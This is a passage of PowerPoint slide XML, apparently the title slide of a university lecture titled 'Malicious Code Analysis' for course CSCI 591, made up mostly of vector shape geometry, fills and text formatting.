                    <a:pt x="1606" y="389"/>
                    <a:pt x="3007" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3118" y="389"/>
                    <a:pt x="3227" y="387"/>
                    <a:pt x="3334" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3334" y="60"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1"/>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49" name="Google Shape;116;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2600721" y="4533413"/>
              <a:ext cx="364428" cy="137485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8954" h="3378" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="485" y="1874"/>
                    <a:pt x="2565" y="3377"/>
                    <a:pt x="4873" y="3377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6249" y="3377"/>
                    <a:pt x="7705" y="2844"/>
                    <a:pt x="8954" y="1537"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7644" y="1"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="3C3C3B"/>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0" name="Google Shape;117;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2649683" y="4533413"/>
              <a:ext cx="474928" cy="92877"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11669" h="2282" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1"/>
                    <a:pt x="429" y="1084"/>
                    <a:pt x="1834" y="1287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1834" y="1287"/>
                    <a:pt x="2152" y="2282"/>
                    <a:pt x="5073" y="2282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5299" y="2282"/>
                    <a:pt x="5540" y="2276"/>
                    <a:pt x="5798" y="2263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7549" y="2180"/>
                    <a:pt x="7977" y="2096"/>
                    <a:pt x="9180" y="1442"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11668" y="1132"/>
                    <a:pt x="11001" y="1"/>
                    <a:pt x="11001" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EEEEEE"/>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1" name="Google Shape;118;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2043946" y="2952235"/>
              <a:ext cx="11640" cy="45625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="286" h="1121" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="286" y="1120"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="7450" cap="rnd" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>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2" name="Google Shape;119;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1964459" y="3547873"/>
              <a:ext cx="589784" cy="661416"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="14491" h="16251" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7267" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7222" y="0"/>
                    <a:pt x="7177" y="12"/>
                    <a:pt x="7132" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4947" y="1375"/>
                    <a:pt x="2774" y="1583"/>
                    <a:pt x="1592" y="1583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1557" y="1583"/>
                    <a:pt x="1522" y="1583"/>
                    <a:pt x="1489" y="1582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="894" y="1558"/>
                    <a:pt x="524" y="1499"/>
                    <a:pt x="524" y="1499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="1496"/>
                    <a:pt x="491" y="1495"/>
                    <a:pt x="474" y="1495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="420" y="1495"/>
                    <a:pt x="368" y="1510"/>
                    <a:pt x="322" y="1546"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="1594"/>
                    <a:pt x="227" y="1666"/>
                    <a:pt x="227" y="1725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="1773"/>
                    <a:pt x="1" y="6535"/>
                    <a:pt x="2680" y="11417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3513" y="12953"/>
                    <a:pt x="4846" y="14429"/>
                    <a:pt x="6942" y="16191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6990" y="16239"/>
                    <a:pt x="7049" y="16251"/>
                    <a:pt x="7109" y="16251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7168" y="16251"/>
                    <a:pt x="7204" y="16239"/>
                    <a:pt x="7263" y="16191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9276" y="14679"/>
                    <a:pt x="10692" y="13203"/>
                    <a:pt x="11585" y="11702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14431" y="6940"/>
                    <a:pt x="14491" y="2058"/>
                    <a:pt x="14491" y="1999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14491" y="1927"/>
                    <a:pt x="14455" y="1844"/>
                    <a:pt x="14395" y="1808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14349" y="1771"/>
                    <a:pt x="14302" y="1741"/>
                    <a:pt x="14250" y="1741"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14236" y="1741"/>
                    <a:pt x="14220" y="1744"/>
                    <a:pt x="14205" y="1749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14205" y="1749"/>
                    <a:pt x="13776" y="1785"/>
                    <a:pt x="13121" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11871" y="1773"/>
                    <a:pt x="9454" y="1511"/>
                    <a:pt x="7418" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7368" y="15"/>
                    <a:pt x="7318" y="0"/>
                    <a:pt x="7267" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFF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3" name="Google Shape;120;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2223718" y="3729027"/>
              <a:ext cx="79528" cy="306797"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1954" h="7538" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="120" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477" y="4799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1548" y="4799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1905" y="1"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1001" y="5585"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="453" y="5585"/>
                    <a:pt x="0" y="6025"/>
                    <a:pt x="0" y="6537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="7078"/>
                    <a:pt x="430" y="7537"/>
                    <a:pt x="980" y="7537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="987" y="7537"/>
                    <a:pt x="994" y="7537"/>
                    <a:pt x="1001" y="7537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1524" y="7537"/>
                    <a:pt x="1953" y="7085"/>
                    <a:pt x="1953" y="6537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1953" y="6025"/>
                    <a:pt x="1524" y="5585"/>
                    <a:pt x="1001" y="5585"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>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4" name="Google Shape;121;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2632711" y="2657611"/>
              <a:ext cx="401750" cy="366422"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9871" h="9003" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7620" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6382" y="1"/>
                    <a:pt x="5394" y="1001"/>
                    <a:pt x="5394" y="2227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5394" y="2739"/>
                    <a:pt x="5572" y="3216"/>
                    <a:pt x="5846" y="3585"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2334" y="6621"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2084" y="6383"/>
                    <a:pt x="1762" y="6228"/>
                    <a:pt x="1381" y="6228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="631" y="6228"/>
                    <a:pt x="0" y="6859"/>
                    <a:pt x="0" y="7621"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="8371"/>
                    <a:pt x="631" y="9002"/>
                    <a:pt x="1381" y="9002"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2143" y="9002"/>
                    <a:pt x="2774" y="8371"/>
                    <a:pt x="2774" y="7621"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2774" y="7323"/>
                    <a:pt x="2667" y="7038"/>
                    <a:pt x="2513" y="6811"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6025" y="3775"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6430" y="4192"/>
                    <a:pt x="7001" y="4466"/>
                    <a:pt x="7632" y="4466"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8870" y="4466"/>
                    <a:pt x="9871" y="3466"/>
                    <a:pt x="9871" y="2227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9835" y="1001"/>
                    <a:pt x="8847" y="1"/>
                    <a:pt x="7620"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5" name="Google Shape;122;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2264418" y="4879399"/>
              <a:ext cx="914936" cy="109564"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="22480" h="2692" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="2692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480" y="2692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480"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6" name="Google Shape;123;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2434014" y="5036907"/>
              <a:ext cx="745828" cy="54294"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1334" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1"/>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7" name="Google Shape;124;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2434014" y="5126079"/>
              <a:ext cx="745828" cy="54294"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1334" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324"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8" name="Google Shape;125;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2689895" y="5214764"/>
              <a:ext cx="489947" cy="54782"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12038" h="1346" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12037" y="1345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12037" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E2E2E2"/>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59" name="Google Shape;126;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2894859" y="2508365"/>
              <a:ext cx="94546" cy="94546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2323" h="2323" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1167" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="524" y="1"/>
                    <a:pt x="1" y="525"/>
                    <a:pt x="1" y="1168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1811"/>
                    <a:pt x="524" y="2323"/>
                    <a:pt x="1167" y="2323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1810" y="2323"/>
                    <a:pt x="2322" y="1811"/>
                    <a:pt x="2322" y="1168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2322" y="525"/>
                    <a:pt x="1810" y="1"/>
                    <a:pt x="1167" y="1"/>
                  </a:cubicBez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0" name="Google Shape;127;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1006072" y="1271750"/>
              <a:ext cx="486039" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11942" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7370" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4572" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11942"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1" name="Google Shape;128;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-705666"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2" name="Google Shape;129;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-405219" y="1271750"/>
              <a:ext cx="485592" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11931" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7359" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4573" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11931"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3" name="Google Shape;130;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-105261" y="1271750"/>
              <a:ext cx="486080" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11943" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7371" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4573" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11943"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4" name="Google Shape;131;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="195186" y="1271750"/>
              <a:ext cx="485103" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11919" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7359" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4573"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5" name="Google Shape;132;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="495633" y="1271750"/>
              <a:ext cx="485103" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11919" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7359" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4561" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11919"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sp>
          <p:nvSpPr>
            <p:cNvPr id="166" name="Google Shape;133;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="792702" y="1271750"/>
              <a:ext cx="485103" cy="429385"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11919" h="10550" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7346" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4560" y="10549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11918" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E0E0E0"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900"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sz="1865" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="矩形 172"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9970770" y="109855"/>
            <a:ext cx="1960245"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rPr>
              <a:t>2023.09.27</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11677571" y="6016506"/>
            <a:ext cx="247650" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;54;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2731135" y="1773555"/>
            <a:ext cx="6729730" cy="2098040"/>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4000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buNone/>
              <a:defRPr sz="53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4000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>Malicious Code Analysis</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="6000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="299085" y="109855"/>
            <a:ext cx="1848142" cy="1296000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;55;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4536123" y="4035425"/>
            <a:ext cx="3119755" cy="749935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr marR="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:defPPr>
            <a:lvl1pPr marR="0" lvl="0"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ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buNone/>
              <a:defRPr sz="2935"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Fangtian Zhong</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a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>CSCI 591</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB" sz="2500" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886710" y="5492115"/>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rPr>
              <a:t>Norm Asbjornson College of Engineering</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
